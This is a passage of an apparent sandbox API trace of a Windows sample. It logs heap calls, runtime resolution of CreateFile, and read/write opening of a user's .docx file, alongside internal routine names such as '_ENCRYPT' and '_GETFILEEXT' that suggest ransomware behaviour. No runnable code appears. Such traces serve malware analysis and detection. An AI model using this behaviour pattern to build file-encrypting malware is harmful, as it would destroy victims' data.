RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.294] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.294] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.296] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8e0 [0035.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.297] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\yjepcpmz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.297] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.297] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.297] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.298] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.298] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0035.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.298] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.298] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.298] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.298] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.298] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.299] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.299] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x415d5310, ftLastWriteTime.dwHighDateTime=0x1d5bb84, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0x7c20c0 [0035.299] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x415d5310, ftLastWriteTime.dwHighDateTime=0x1d5bb84, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0x7c20c0 [0035.299] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS 